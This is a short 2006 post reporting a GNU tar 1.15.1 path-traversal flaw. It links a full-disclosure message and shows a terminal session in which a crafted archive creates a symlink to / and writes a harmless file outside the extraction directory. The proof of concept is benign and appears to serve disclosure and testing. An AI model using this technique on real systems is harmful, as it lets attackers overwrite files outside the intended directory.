tar exploit in the wild
cornet — Tue, 2006-11-21 23:55
Just when you thought you were safe...
http://lists.grok.org.uk/pipermail/full-disclosure/2006-November/050812.html
Have tested this and it works as described:
nathan@holly /tmp $ tar --version tar (GNU tar) 1.15.1 nathan@holly /tmp $ ~/tmp/tarxyz > foo.tar nathan@holly /tmp $ mkdir -p xyz/home/foo nathan@holly /tmp $ echo "Hello" > xyz/home/foo/hello.txt nathan@holly /tmp $ tar -rf foo.tar xyz/home/foo nathan@holly /tmp $ rootdo mkdir /home/foo nathan@holly /tmp $ rootdo chown nathan /home/foo nathan@holly /tmp $ rm -rf xyz nathan@holly /tmp $ tar -xf foo.tar nathan@holly /tmp $ ls -l xyz lrwxrwxrwx 1 nathan users 1 Nov 22 00:03 xyz -> / nathan@holly /tmp $ cat /home/foo/hello.txt Hello nathan@holly /tmp $